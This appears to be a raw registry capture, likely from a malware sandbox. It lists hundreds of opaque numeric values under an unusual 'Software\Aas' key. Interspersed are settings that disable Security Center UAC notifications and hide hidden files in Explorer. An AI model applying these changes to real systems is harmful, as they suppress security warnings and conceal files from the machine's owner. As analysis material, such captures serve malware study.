"a4_558" = "4000369518"
"a4_555" = "3978862155"
"a4_554" = "3971693034"
"a4_557" = "3993200397"
"a4_556" = "3986031276"
"a4_551" = "3950185671"
"a4_550" = "3943016550"
"a4_553" = "3964523913"
"a4_552" = "3957354792"
"a1_753" = "2969640766"
"a4_824" = "1612388408"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Aas]
"a4_392" = "2810295432"
"a4_391" = "2803126311"
"a4_390" = "2795957190"
"a4_397" = "2846141037"
"a4_396" = "2838971916"
"a4_395" = "2831802795"
"a4_394" = "2824633674"
"a4_399" = "2860479279"
"a4_398" = "2853310158"
"a4_865" = "1906322369"
"a4_864" = "1899153248"
"a4_867" = "1920660611"
"a1_932" = "4272302750"
"a4_866" = "1913491490"
"a1_933" = "2636701689"
"a4_861" = "1877645885"
"a3_758" = "1122262303"
"a4_860" = "1870476764"
"a1_931" = "3072739185"
"a4_863" = "1891984127"
"a1_936" = "540751926"
"a4_862" = "1884815006"
"a1_937" = "1598610983"
"a2_405" = "2903495461"
"a2_404" = "2896327497"
"a2_407" = "2917826880"
"a2_406" = "2910660619"
"a2_401" = "2874813226"
"a2_400" = "2867655817"
"a2_403" = "2889164642"
"a2_402" = "2881994197"
"a1_935" = "4138801932"
"a2_409" = "2932163374"
"a2_408" = "2924997719"
"a2_975" = "2694933895"
"a2_974" = "2687762041"
"a2_977" = "2709271366"
"a2_976" = "2702088180"
"a2_971" = "2666245556"
"a2_970" = "2659076570"
"a2_973" = "2680592604"
"a4_896" = "2128565120"
"a2_979" = "2723596596"
"a2_978" = "2716427134"
"a1_222" = "1697862868"
"a1_223" = "2332371639"
"a1_220" = "728864114"
"a1_221" = "1054174184"
"a1_226" = "1211577199"
"a1_227" = "2719128626"
"a1_224" = "278714921"
"a1_225" = "678688826"
"a1_228" = "3834750495"
"a1_229" = "3690810648"
"a2_993" = "2823963030"
"a2_992" = "2816792231"
"a2_991" = "2809629413"
"a2_990" = "2802464842"
"a2_994" = "2831146629"
"a2_579" = "4150923508"
"a2_578" = "4143758513"
"a2_571" = "4093574177"
"a2_570" = "4086392821"
"a2_573" = "4107908666"
"a2_572" = "4100739841"
"a2_575" = "4122241032"
"a2_574" = "4115073259"
"a2_577" = "4136577315"
"a2_576" = "4129407405"
"a2_351" = "2516369194"
"a2_350" = "2509185927"
"a2_353" = "2530701948"
"a2_352" = "2523536871"
"a2_355" = "2545034446"
"a2_354" = "2537871531"
"a2_357" = "2559370466"
"a2_356" = "2552205252"
"a2_359" = "2573719732"
"a2_358" = "2566537237"
"a3_906" = "2183550307"
"a3_622" = "147491207"
"a2_193" = "1383644038"
"a2_192" = "1376473919"
"a2_191" = "1369294027"
"a2_190" = "1362127543"
"a2_197" = "1412311012"
"a2_196" = "1405142778"
"a2_195" = "1397976182"
"a2_194" = "1390809042"
"a3_624" = "195544665"
"a2_199" = "1426663100"
"a2_198" = "1419491622"
"a3_625" = "168917752"
"a2_759" = "1146389308"
"a3_626" = "175906587"
"a2_755" = "1117722216"
"a2_754" = "1110555765"
"a2_757" = "1132065518"
"a3_627" = "183481274"
"a2_751" = "1089040185"
"a2_750" = "1081872199"
"a2_753" = "1103388417"
"a2_752" = "1096204960"
"a1_536" = "3781296199"
"a1_537" = "1676928455"
"a1_534" = "3989900684"
"a1_535" = "1772206058"
"a1_89" = "2153058010"
"a1_88" = "184567349"
"a1_530" = "2519785980"
"a1_531" = "2067627139"
"a1_85" = "1475478120"
"a1_84" = "3885369117"
"a1_87" = "1804582497"
"a1_86" = "3379293925"
"a1_81" = "1910525049"
"a1_80" = "2646392066"
"a1_83" = "3612598821"
"a1_82" = "2057941209"
"a3_914" = "2274560123"
"a2_898" = "2142897778"
"a1_896" = "2640968174"
"a1_890" = "1379818723"
"a2_899" = "2150079436"
"a1_67" = "2810626750"
"a1_66" = "1853834819"
"a1_65" = "2546327511"
"a3_133" = "970345548"
"a1_63" = "2571357412"
"a3_135" = "950830350"
"a3_136" = "991836577"
"a1_60" = "1684438400"
"a3_138" = "1006335587"
"a3_139" = "979823234"
"a3_684" = "625694981"
"a1_438" = "1669362036"
"a3_682" = "577634371"
"a3_683" = "584688866"
"a1_69" = "3952531312"
"a1_68" = "1598359998"
"a3_228" = "1617824845"
"a3_229" = "1624875244"
"a3_224" = "1588903625"
"a3_225" = "1629901672"
"a3_226" = "1636956043"
"a3_227" = "1610836010"
"a3_220" = "1593911669"
"a3_221" = "1600966036"
"a3_222" = "1608410679"
"a3_223" = "1581849174"
"a1_408" = "1689397585"
"a1_409" = "750069319"
"a1_402" = "1793360672"
"a1_281" = "29460262"
"a1_400" = "936115268"
"a1_401" = "2602848335"
"a1_406" = "3499375817"
"a1_407" = "385072452"
"a1_404" = "586219311"
"a1_405" = "4291811275"
"a2_823" = "1605211008"
"a2_822" = "1598052761"
"a2_821" = "1590883277"
"a3_354" = "2521277451"
"a3_355" = "2528204970"
"a3_356" = "2568813773"
"a3_357" = "2576322924"
"a3_350" = "2492225207"
"a3_351" = "2499791574"
"a3_352" = "2540269385"
"a3_353" = "2547254248"
"a2_827" = "1633899258"
"a1_628" = "2943906745"
"a3_358" = "2583246223"
"a3_359" = "2556735022"
"a1_854" = "2437090083"
"a2_826" = "1626732833"
"a2_825" = "1619550440"
"a1_718" = "2879078320"
"a1_719" = "284737758"
"a1_716" = "772014111"
"a1_717" = "2531109333"
"a1_714" = "1494843184"
"a1_715" = "611845424"
"a1_712" = "404114822"
"a1_713" = "129097115"
"a1_710" = "175263834"
"a1_711" = "2881229524"
"a4_809" = "1504851593"
"a4_808" = "1497682472"
"a4_803" = "1461836867"
"a1_629" = "178037608"
"a4_801" = "1447498625"
"a4_800" = "1440329504"
"a4_807" = "1490513351"
"a4_806" = "1483344230"
"a4_805" = "1476175109"
"a4_804" = "1469005988"
"a4_37" = "265257477"
"a4_36" = "258088356"
"a4_35" = "250919235"
"a4_34" = "243750114"
"a4_33" = "236580993"
"a4_32" = "229411872"
"a4_31" = "222242751"
"a4_30" = "215073630"
"a4_144" = "1032353424"
"a4_39" = "279595719"
"a4_38" = "272426598"
"a3_915" = "2281614490"
"a4_843" = "1748601707"
"a3_142" = "1034864615"
"a4_946" = "2487021170"
"a4_947" = "2494190291"
"a4_944" = "2472682928"
"a4_945" = "2479852049"
"a4_942" = "2458344686"
"a4_943" = "2465513807"
"a4_940" = "2444006444"
"a4_941" = "2451175565"
"a4_948" = "2501359412"

[HKCU\Software\Aas\695404737]
"28676484" = "35"

[HKCU\Software\Aas]
"a4_498" = "3570222258"
"a4_499" = "3577391379"
"a4_494" = "3541545774"
"a4_495" = "3548714895"
"a4_496" = "3555884016"
"a4_497" = "3563053137"
"a4_490" = "3512869290"
"a4_491" = "3520038411"
"a4_492" = "3527207532"
"a4_493" = "3534376653"
"a3_448" = "3194799081"
"a3_449" = "3202245640"
"a2_941" = "2451170221"
"a4_708" = "780770372"
"a4_709" = "787939493"
"a3_918" = "2303105535"
"a3_919" = "2310025758"
"a4_704" = "752093888"
"a4_705" = "759263009"
"a4_706" = "766432130"
"a4_707" = "773601251"

[HKLM\SOFTWARE\Microsoft\Security Center\Svc]
"UacDisableNotify" = "1"

[HKCU\Software\Aas]
"a4_701" = "730586525"
"a4_702" = "737755646"
"a4_703" = "744924767"
"a1_888" = "1726509101"
"a1_889" = "3406862018"
"a1_886" = "4156922224"
"a1_887" = "3922849125"
"a1_884" = "243974972"
"a1_885" = "2953956587"
"a1_882" = "2304220271"
"a1_883" = "3403260960"
"a1_880" = "1818768461"
"a1_881" = "3620676750"
"a4_124" = "888971004"
"a4_125" = "896140125"
"a4_126" = "903309246"
"a4_127" = "910478367"
"a4_120" = "860294520"
"a4_121" = "867463641"
"a4_122" = "874632762"
"a4_123" = "881801883"
"a4_128" = "917647488"
"a4_129" = "924816609"
"a2_593" = "4251292123"
"a3_444" = "3166269973"
"a3_445" = "3206813364"
"a1_831" = "2792940417"
"a2_592" = "4244125435"
"a1_930" = "1809343181"
"a1_948" = "3516558345"
"a4_238" = "1706250798"
"a4_239" = "1713419919"
"a4_230" = "1648897830"
"a4_231" = "1656066951"
"a4_232" = "1663236072"
"a4_233" = "1670405193"
"a4_234" = "1677574314"
"a4_235" = "1684743435"
"a4_236" = "1691912556"
"a4_237" = "1699081677"
"a1_480" = "2819652031"
"a1_723" = "2985076650"
"a1_722" = "2914670029"
"a1_721" = "1090546917"
"a1_720" = "939116030"
"a1_768" = "1161393244"
"a1_727" = "1761764185"
"a1_726" = "3337465261"
"a2_643" = "314770726"
"a2_790" = "1368643001"
"a1_725" = "3097050339"
"a2_642" = "307603061"
"a1_724" = "2234995210"
"a2_641" = "300434344"
"a2_640" = "293269255"
"a2_647" = "343451624"
"a2_646" = "336287397"
"a1_158" = "4250421600"
"a1_159" = "3032160534"
"a2_645" = "329119478"
"a1_150" = "4164905401"
"a1_151" = "346538762"
"a1_152" = "1038566053"
"a1_153" = "2923469627"
"a1_154" = "346925284"
"a1_155" = "691156697"
"a1_156" = "1907331657"
"a1_157" = "2663427343"
"a1_235" = "2751356343"
"a1_234" = "1355660823"
"a1_237" = "4287470736"
"a1_236" = "1318848195"
"a1_231" = "34409378"
"a1_230" = "4149099775"
"a1_233" = "2461048126"
"a1_232" = "2555419590"
"a1_239" = "2204332961"
"a1_238" = "2445416036"
"a2_210" = "1505512980"
"a2_211" = "1512677778"
"a2_212" = "1519845775"
"a2_213" = "1527026266"
"a2_214" = "1534194675"
"a2_215" = "1541362678"
"a2_216" = "1548527355"
"a2_217" = "1555706656"
"a2_218" = "1562860507"
"a2_219" = "1570031907"
"a1_966" = "3424760658"
"a2_508" = "3641906355"
"a2_509" = "3649080602"
"a2_504" = "3613229980"
"a2_505" = "3620412598"
"a2_506" = "3627581346"
"a2_507" = "3634752577"
"a2_500" = "3584563131"
"a2_501" = "3591728843"
"a2_502" = "3598896084"
"a2_503" = "3606061647"
"a2_791" = "1375812956"
"a2_698" = "709078014"
"a2_699" = "716246722"
"a2_694" = "680397031"
"a2_695" = "687576671"
"a2_696" = "694746263"
"a2_697" = "701911738"
"a2_690" = "651727993"
"a2_691" = "658893060"
"a2_692" = "666061571"
"a2_693" = "673228528"
"a2_324" = "2322804494"
"a2_325" = "2329965262"
"a2_326" = "2337131967"
"a2_327" = "2344299316"
"a2_320" = "2294113601"
"a2_321" = "2301282895"
"a2_322" = "2308461910"
"a2_323" = "2315632451"
"a1_521" = "2724103127"
"a1_520" = "663081302"
"a1_523" = "247882614"
"a1_522" = "414806937"
"a2_328" = "2351466198"
"a2_329" = "2358647091"
"a1_527" = "235822516"
"a1_526" = "1939603844"
"a2_799" = "1433168016"
"a2_798" = "1425983077"
"a4_962" = "2601727106"
"a1_98" = "2197334354"
"a1_99" = "877027034"
"a1_92" = "3417203073"
"a1_93" = "2678459250"
"a1_90" = "3737006536"
"a1_91" = "2159601734"
"a1_96" = "1945451838"
"a1_97" = "2372398239"
"a1_94" = "748921032"
"a1_95" = "4129524421"
"a1_74" = "3055919783"
"a1_75" = "2025323376"
"a1_76" = "3951511568"
"a1_77" = "2431097687"
"a1_70" = "1749023192"
"a1_71" = "4171191198"
"a1_72" = "475022109"
"a1_73" = "3633798136"
"a3_699" = "733118194"
"a3_698" = "725670483"
"a3_129" = "907869896"
"a3_128" = "934369961"
"a1_78" = "285588128"
"a1_79" = "3334442424"
"a3_239" = "1730403494"
"a3_238" = "1689270279"
"a3_237" = "1682343908"
"a3_236" = "1708909381"
"a3_235" = "1701334818"
"a3_234" = "1660856963"
"a3_233" = "1653814880"
"a3_232" = "1646370241"
"a3_231" = "1672935854"
"a3_230" = "1665877263"
"a1_419" = "4164683133"
"a1_418" = "2088309724"
"a3_953" = "2520368944"
"a1_415" = "3895266945"
"a1_414" = "2108980362"
"a1_417" = "1061693774"
"a1_416" = "4226891513"
"a1_411" = "3864165760"
"a1_410" = "2843834766"
"a1_413" = "1200511010"
"a1_412" = "1041666117"
"a3_939" = "2419869154"
"a3_347" = "2504287570"
"a3_346" = "2463809843"
"a3_345" = "2456759440"
"a3_344" = "2482866289"
"a3_343" = "2475825118"
"a3_342" = "2468836287"
"a3_341" = "2427838236"
"a3_340" = "2420783869"
"a3_349" = "2485301780"
"a3_348" = "2511804917"
"a1_701" = "3107286467"
"a1_700" = "2561745409"
"a1_703" = "2269783569"
"a1_702" = "1943873600"
"a1_705" = "571934590"
"a1_704" = "2120472948"
"a1_707" = "2321671098"
"a1_706" = "460063535"
"a1_709" = "1130569431"
"a1_708" = "509000513"
"a2_360" = "2580887096"
"a4_838" = "1712756102"
"a2_361" = "2588061668"
"a4_836" = "1698417860"
"a4_837" = "1705586981"
"a4_834" = "1684079618"
"a4_835" = "1691248739"
"a4_832" = "1669741376"
"a2_362" = "2595220181"
"a4_830" = "1655403134"
"a4_831" = "1662572255"
"a4_24" = "172058904"
"a4_25" = "179228025"
"a4_26" = "186397146"
"a4_27" = "193566267"
"a4_20" = "143382420"
"a4_21" = "150551541"
"a4_22" = "157720662"
"a4_23" = "164889783"
"a4_951" = "2522866775"
"a2_364" = "2609553612"
"a4_953" = "2537205017"
"a4_952" = "2530035896"
"a4_28" = "200735388"
"a4_29" = "207904509"
"a4_957" = "2565881501"
"a2_365" = "2616723647"
"a2_366" = "2623905761"
"a2_367" = "2631071754"
"a1_743" = "1887053530"
"a2_168" = "1204405843"
"a2_169" = "1211585110"
"a4_847" = "1777278191"
"a4_489" = "3505700169"
"a4_488" = "3498531048"
"a4_487" = "3491361927"
"a4_486" = "3484192806"
"a4_485" = "3477023685"
"a4_484" = "3469854564"
"a4_483" = "3462685443"
"a4_482" = "3455516322"
"a4_481" = "3448347201"
"a4_480" = "3441178080"
"a2_160" = "1147051639"
"a4_973" = "2680587437"
"a2_161" = "1154234101"
"a4_977" = "2709263921"
"a4_972" = "2673418316"
"a4_971" = "2666249195"
"a3_901" = "2147558220"
"a3_900" = "2174193453"
"a3_903" = "2162063374"
"a3_902" = "2154612719"
"a3_905" = "2209657024"
"a3_904" = "2202606753"
"a4_719" = "859630703"
"a4_718" = "852461582"
"a4_717" = "845292461"
"a4_716" = "838123340"
"a4_715" = "830954219"
"a4_714" = "823785098"
"a4_713" = "816615977"
"a4_712" = "809446856"
"a4_711" = "802277735"
"a4_710" = "795108614"
"a1_891" = "1631329103"
"a3_776" = "1251683361"
"a1_893" = "784550923"
"a1_892" = "2627712134"
"a1_895" = "1041336267"
"a1_894" = "1069844185"
"a1_897" = "2322242613"
"a3_777" = "1292288064"
"a1_899" = "508583449"
"a1_898" = "511146253"
"a4_974" = "2687756558"
"a3_774" = "1270749039"
"a4_137" = "982169577"
"a4_136" = "975000456"
"a4_135" = "967831335"
"a4_134" = "960662214"
"a4_133" = "953493093"
"a4_132" = "946323972"
"a4_131" = "939154851"
"a4_130" = "931985730"
"a3_772" = "1222762157"
"a4_139" = "996507819"
"a4_138" = "989338698"
"a4_975" = "2694925679"
"a3_770" = "1208254955"
"a3_771" = "1215707658"
"a2_455" = "3261953343"
"a1_617" = "2611428864"
"a4_229" = "1641728709"
"a4_228" = "1634559588"
"a4_223" = "1598713983"
"a4_222" = "1591544862"
"a4_221" = "1584375741"
"a4_220" = "1577206620"
"a4_227" = "1627390467"
"a4_226" = "1620221346"
"a4_225" = "1613052225"
"a4_224" = "1605883104"
"a1_615" = "3339368793"
"a2_459" = "3290620076"
"a3_678" = "548713167"
"a1_614" = "1953332760"
"a1_820" = "3069423840"
"a1_821" = "1830246570"
"a1_822" = "3072133451"

"a1_149" = "17671467"
"a1_148" = "1832140104"
"a1_143" = "106027243"
"a1_142" = "1520800629"
"a1_141" = "1778917173"
"a1_140" = "3825668026"
"a1_147" = "3312589158"
"a1_146" = "628198402"
"a1_145" = "3802423937"
"a1_144" = "2858977314"
"a1_826" = "2109132756"
"a1_827" = "981766117"
"a2_203" = "1455329080"
"a2_202" = "1448159685"
"a2_201" = "1440990642"
"a2_200" = "1433826919"
"a2_207" = "1484011448"
"a2_206" = "1476843736"
"a2_205" = "1469675751"
"a2_204" = "1462493414"
"a2_209" = "1498343518"
"a2_208" = "1491178145"
"a2_519" = "3720780994"
"a2_518" = "3713599066"
"a2_517" = "3706432652"
"a2_516" = "3699275349"
"a2_515" = "3692088562"
"a2_514" = "3684932949"
"a2_513" = "3677762794"
"a2_512" = "3670596652"
"a2_511" = "3663415996"
"a2_510" = "3656245669"
"a2_689" = "644549180"
"a2_688" = "637394320"
"a2_687" = "630225840"
"a2_686" = "623046014"
"a2_685" = "615888822"
"a2_684" = "608710538"
"a2_683" = "601550506"
"a2_682" = "594375261"
"a2_681" = "587210643"
"a2_680" = "580041891"
"a2_337" = "2415999798"
"a2_336" = "2408817461"
"a2_335" = "2401650592"
"a2_334" = "2394484028"
"a2_333" = "2387316518"
"a2_332" = "2380151534"
"a2_331" = "2372980811"
"a2_330" = "2365800640"
"a1_554" = "3349610808"
"a1_555" = "2134000695"
"a1_556" = "2381122013"
"a1_557" = "3295115192"
"a3_242" = "1718323611"
"a1_551" = "1377688478"
"a2_339" = "2430334434"
"a2_338" = "2423169013"
"a4_673" = "529851137"
"a1_918" = "2424912414"
"a1_919" = "2484379630"
"a3_243" = "1725243962"
"a1_852" = "124100507"
"a1_914" = "1140304364"
"a1_398" = "4081065631"
"a1_399" = "131082258"
"a4_679" = "572865863"
"a1_392" = "1002438747"
"a1_393" = "2413094997"
"a1_390" = "2482137491"
"a1_391" = "11634558"
"a1_396" = "517715575"
"a1_397" = "3481333174"
"a1_394" = "872282885"
"a1_395" = "3696671095"
"a1_858" = "1631589699"
"a3_116" = "814879197"
"a3_117" = "821922428"
"a3_114" = "834001179"
"a3_115" = "807894458"
"a3_112" = "785940569"
"a3_113" = "826942712"
"a3_110" = "771902343"
"a3_111" = "778955814"
"a1_49" = "2435481947"
"a1_48" = "2981631336"
"a3_554" = "3988280259"
"a3_118" = "862924447"
"a3_119" = "869974846"
"a3_202" = "1465015971"
"a3_203" = "1472066242"
"a3_200" = "1416954337"
"a3_201" = "1424013824"
"a3_206" = "1493543975"
"a3_207" = "1500987462"
"a3_204" = "1445500773"
"a3_205" = "1452936068"
"a1_197" = "302335216"
"a3_759" = "1163391422"
"a3_208" = "1508041977"
"a3_209" = "1481480472"
"a3_592" = "4261104249"
"a3_593" = "4234604184"
"a3_590" = "4246617511"
"a3_591" = "4253667782"
"a3_596" = "4289649661"
"a3_597" = "4263017500"
"a3_594" = "4241589051"
"a3_595" = "4282591066"
"a3_598" = "4270526655"
"a3_599" = "4277581022"
"a4_848" = "1784447312"
"a3_578" = "4160735531"
"a3_579" = "4134104394"
"a4_770" = "1225255874"
"a3_570" = "4069660115"
"a3_571" = "4076703346"
"a3_572" = "4117701269"
"a3_573" = "4124755764"
"a3_574" = "4098128727"
"a3_575" = "4105641974"
"a3_576" = "4146245737"
"a3_577" = "4153169032"
"a1_774" = "2476487416"
"a1_775" = "3157274098"
"a1_776" = "3729111734"
"a1_777" = "2538396187"
"a1_191" = "4157591957"
"a1_771" = "1601776510"
"a1_772" = "2467964831"
"a1_773" = "3436073051"
"a1_953" = "1270748759"
"a3_927" = "2367492374"
"a1_778" = "961778820"
"a1_779" = "3624902882"
"a3_926" = "2326953207"
"a2_17" = "121877384"
"a2_16" = "114711734"
"a2_15" = "107542671"
"a2_14" = "100361458"
"a2_13" = "93195914"
"a2_12" = "86026473"
"a2_11" = "78858807"
"a2_10" = "71694322"
"a4_829" = "1648234013"
"a4_828" = "1641064892"
"a4_776" = "1268270600"
"a1_592" = "245252358"
"a2_19" = "136210735"
"a2_18" = "129046401"
"a4_11" = "78860331"
"a4_10" = "71691210"
"a4_13" = "93198573"
"a4_12" = "86029452"
"a4_15" = "107536815"
"a4_14" = "100367694"
"a4_17" = "121875057"
"a4_16" = "114705936"
"a4_19" = "136213299"
"a4_18" = "129044178"
"a4_926" = "2343638750"
"a4_927" = "2350807871"
"a1_878" = "1184625151"
"a4_921" = "2307793145"
"a4_922" = "2314962266"
"a1_595" = "407962333"
"a1_596" = "1450277516"
"a4_987" = "2780955131"
"a1_597" = "3407142639"
"a1_608" = "1866556539"
"a1_609" = "3732552317"
"a3_378" = "2693094675"
"a3_379" = "2700145074"
"a4_846" = "1770109070"
"a3_372" = "2683746013"
"a3_373" = "2657102716"
"a3_370" = "2669182491"
"a3_371" = "2676691642"
"a3_376" = "2712142929"
"a3_377" = "2686171376"
"a3_374" = "2664681375"
"a3_375" = "2705154110"
"a1_759" = "1701358265"
"a3_488" = "3515101889"
"a3_489" = "3522680672"
"a4_841" = "1734263465"
"a4_840" = "1727094344"
"a1_950" = "3410890411"
"a3_484" = "3486690637"
"a1_952" = "507976207"
"a2_925" = "2336467872"
"a1_954" = "1324212678"
"a1_955" = "2473960878"
"a1_956" = "2462016830"
"a3_485" = "3460055532"
"a1_958" = "3953326916"
"a2_922" = "2314968461"
"a1_750" = "1163331228"
"a1_751" = "2243276449"
"a1_756" = "1337025626"
"a1_757" = "2183051651"
"a4_722" = "881138066"
"a4_723" = "888307187"
"a4_720" = "866799824"
"a1_661" = "4101970729"
"a4_726" = "909814550"
"a4_727" = "916983671"
"a4_724" = "895476308"
"a4_725" = "902645429"
"a4_728" = "924152792"
"a4_729" = "931321913"
"a3_978" = "2699694267"
"a3_979" = "2740303066"
"a3_127" = "927442486"
"a1_189" = "3928029867"
"a4_903" = "2178748967"
"a1_188" = "666204546"
"a4_900" = "2157241604"
"a1_187" = "3861311338"
"a4_901" = "2164410725"
"a1_186" = "1891755722"
"a2_929" = "2365150037"
"a4_905" = "2193087209"
"a4_586" = "4201104906"
"a4_587" = "4208274027"
"a4_584" = "4186766664"
"a4_585" = "4193935785"
"a4_582" = "4172428422"
"a4_583" = "4179597543"
"a4_580" = "4158090180"
"a4_581" = "4165259301"
"a3_800" = "1423623433"
"a3_801" = "1464105384"
"a3_802" = "1471618507"
"a3_803" = "1445115498"
"a3_804" = "1452026509"
"a3_805" = "1459605292"
"a4_588" = "4215443148"
"a4_589" = "4222612269"
"a3_645" = "312377932"
"a4_909" = "2221763693"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
"Hidden" = "2"

[HKCU\Software\Aas]
"a4_966" = "2630403590"
"a4_218" = "1562868378"
"a4_219" = "1570037499"
"a4_216" = "1548530136"
"a4_217" = "1555699257"
"a4_214" = "1534191894"
"a4_215" = "1541361015"
"a4_212" = "1519853652"
"a4_213" = "1527022773"
"a4_210" = "1505515410"
"a4_211" = "1512684531"
"a4_458" = "3283457418"
"a4_459" = "3290626539"
"a4_108" = "774265068"
"a4_109" = "781434189"
"a1_843" = "4188578610"
"a4_102" = "731250342"
"a4_103" = "738419463"
"a4_100" = "716912100"
"a4_101" = "724081221"
"a4_106" = "759926826"
"a4_107" = "767095947"
"a4_104" = "745588584"
"a4_105" = "752757705"
"a1_605" = "3218039797"
"a1_558" = "1577893396"
"a1_559" = "1580383126"
"a1_606" = "1900390487"
"a3_925" = "2319505492"
"a1_178" = "2180300380"
"a1_179" = "3996885725"
"a1_176" = "819821214"
"a1_177" = "3604557228"
"a1_174" = "1168857504"
"a1_175" = "1602631248"
"a1_172" = "3141924510"
"a1_173" = "3725528916"
"a1_170" = "243996688"
"a1_171" = "22812050"
"a1_550" = "142737436"
"a2_236" = "1691915190"
"a2_237" = "1699073434"
"a2_234" = "1677580893"
"a2_235" = "1684748386"
"a2_232" = "1663233423"
"a2_233" = "1670412675"
"a2_230" = "1648898135"
"a2_231" = "1656064921"
"a1_553" = "3107006708"
"a2_238" = "1706248057"
"a2_239" = "1713416753"
"a2_522" = "3742283342"
"a2_523" = "3749447821"
"a2_520" = "3727949675"
"a2_521" = "3735114942"
"a2_526" = "3770951801"
"a2_527" = "3778133739"
"a2_524" = "3756617497"
"a2_525" = "3763782715"
"a2_838" = "1712752273"
"a2_839" = "1719917258"
"a2_528" = "3785304087"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Aas]
"a3_688" = "620670617"
"a1_626" = "2515070792"
"a1_627" = "1356612822"
"a1_624" = "2039272743"
"a1_549" = "739988663"
"a1_548" = "3363137265"
"a1_547" = "3226568191"
"a1_546" = "3639109714"
"a1_545" = "2142890170"
"a1_544" = "2054830568"
"a1_543" = "1288414408"
"a1_542" = "2475116768"
"a1_541" = "270667172"
"a1_540" = "3940050757"
"a2_658" = "422321933"
"a2_659" = "429490090"
"a2_308" = "2208095553"
"a2_309" = "2215264142"
"a2_302" = "2165067684"
"a2_303" = "2172244818"
"a2_300" = "2150695931"
"a2_301" = "2157913031"
"a2_306" = "2193745325"
"a2_307" = "2200925917"
"a2_304" = "2179409074"
"a2_305" = "2186578484"
"a2_786" = "1339954200"
"a2_787" = "1347125572"
"a2_784" = "1325626207"
"a2_785" = "1332795158"
"a2_782" = "1311291760"
"a2_783" = "1318458126"
"a2_780" = "1296944976"
"a2_781" = "1304111042"
"a2_788" = "1354291875"
"a2_789" = "1361462130"
"a1_389" = "2240673979"
"a1_388" = "1513921886"
"a1_385" = "2008986284"
"a1_384" = "3717002203"
"a1_387" = "638331032"
"a1_386" = "684541491"
"a1_381" = "1681334575"
"a1_380" = "3076709016"
"a1_383" = "3064238"
"a1_382" = "2172749025"
"a1_58" = "1568413605"
"a1_59" = "589765179"
"a1_56" = "3052013710"
"a1_57" = "3319990861"
"a1_54" = "1148483149"
"a1_55" = "3825902595"
"a1_52" = "527995160"
"a1_53" = "3735036578"
"a1_50" = "1651195275"
"a1_51" = "76265448"
"a3_215" = "1524377438"
"a3_214" = "1517454143"
"a3_217" = "1572437008"
"a3_216" = "1565514737"
"a3_211" = "1529532890"
"a3_210" = "1488928187"
"a3_213" = "1510469276"
"a3_212" = "1536445053"
"a1_616" = "2159277526"
"a3_748" = "1050812741"
"a3_219" = "1553446098"
"a3_218" = "1545867443"
"a3_585" = "4177070976"
"a3_584" = "4170159969"
"a3_587" = "4225122370"
"a3_586" = "4217678883"
"a3_581" = "4182227468"
"a3_580" = "4141089261"
"a3_583" = "4162646734"
"a3_582" = "4189150895"
"a3_589" = "4205615364"
"a3_588" = "4198622437"
"a3_893" = "2090093684"
"a3_569" = "4062671280"
"a3_568" = "4088782097"
"a3_563" = "4052790138"
"a3_562" = "4045747931"
"a3_561" = "4005270200"
"a3_560" = "3997761049"
"a3_567" = "4081727742"
"a3_566" = "4040721503"
"a3_565" = "4033732668"
"a3_564" = "4026683293"
"a3_109" = "798021476"
"a3_108" = "790966981"
"a1_765" = "2972257135"
"a1_764" = "1636297049"
"a1_763" = "1259093698"
"a1_762" = "2834068242"
"a1_761" = "3333735464"
"a3_724" = "878479485"
"a3_101" = "707522668"
"a3_100" = "733503437"
"a3_103" = "754977070"
"a3_102" = "714511503"
"a3_105" = "769475040"
"a3_104" = "762555713"
"a3_107" = "750493346"
"a3_106" = "742980099"
"a4_854" = "1827462038"
"a4_855" = "1834631159"
"a4_856" = "1841800280"
"a3_726" = "926531903"
"a4_850" = "1798785554"
"a4_851" = "1805954675"
"a4_852" = "1813123796"
"a4_853" = "1820292917"
"a3_721" = "890560280"
"a2_914" = "2257601029"
"a4_858" = "1856138522"
"a1_586" = "2891085136"
"a1_789" = "3054542244"
"a3_720" = "849951481"
"a4_393" = "2817464553"
"a3_898" = "2126083691"
"a3_723" = "904992730"
"a4_939" = "2436837323"
"a4_938" = "2429668202"
"a4_937" = "2422499081"
"a4_936" = "2415329960"
"a4_935" = "2408160839"
"a3_722" = "898003899"
"a4_933" = "2393822597"
"a4_932" = "2386653476"
"a4_931" = "2379484355"
"a4_930" = "2372315234"
"a3_955" = "2568364018"
"a1_788" = "2040568148"
"a1_619" = "3250009310"
"a1_618" = "3717696090"
"a3_369" = "2628699640"
"a3_368" = "2621645145"
"a3_365" = "2600170596"
"a3_364" = "2592723909"
"a3_367" = "2647756070"
"a3_366" = "2640767111"
"a3_361" = "2604787424"
"a3_360" = "2564178497"
"a3_363" = "2585673634"
"a3_362" = "2611780355"
"a4_520" = "3727942920"
"a4_521" = "3735112041"
"a1_584" = "1055098869"
"a4_522" = "3742281162"
"a2_62" = "444487833"
"a4_523" = "3749450283"
"a2_63" = "451653007"
"a4_524" = "3756619404"
"a1_971" = "4174754513"
"a2_60" = "430150046"
"a4_525" = "3763788525"
"a1_943" = "3037499394"
"a1_942" = "2469986207"
"a1_941" = "1088355478"
"a2_61" = "437318299"
"a1_947" = "3435074974"
"a4_526" = "3770957646"
"a1_945" = "3539251043"
"a1_944" = "866347230"
"a2_66" = "473169908"
"a1_949" = "3627104204"
"a4_527" = "3778126767"
"a2_67" = "480334474"
"a2_64" = "458832075"
"a2_65" = "465986192"
"a4_735" = "974336639"
"a4_734" = "967167518"
"a4_737" = "988674881"
"a4_736" = "981505760"
"a4_731" = "945660155"
"a4_730" = "938491034"
"a4_733" = "959998397"
"a4_732" = "952829276"
"a4_739" = "1003013123"
"a4_738" = "995844002"
"a3_969" = "2668861696"
"a3_968" = "2627790049"
"a4_599" = "4294303479"
"a4_598" = "4287134358"
"a1_782" = "1276249120"
"a4_591" = "4236950511"
"a4_590" = "4229781390"
"a4_593" = "4251288753"
"a4_592" = "4244119632"
"a4_595" = "4265626995"
"a4_594" = "4258457874"
"a4_597" = "4279965237"
"a4_596" = "4272796116"
"a1_786" = "1227018080"
"a1_41" = "1595305539"
"a1_40" = "1426961046"
"a1_43" = "367074832"
"a3_819" = "1559971962"
"a1_42" = "1366797527"
"a3_813" = "1516544548"
"a1_45" = "273932487"
"a3_811" = "1536136546"
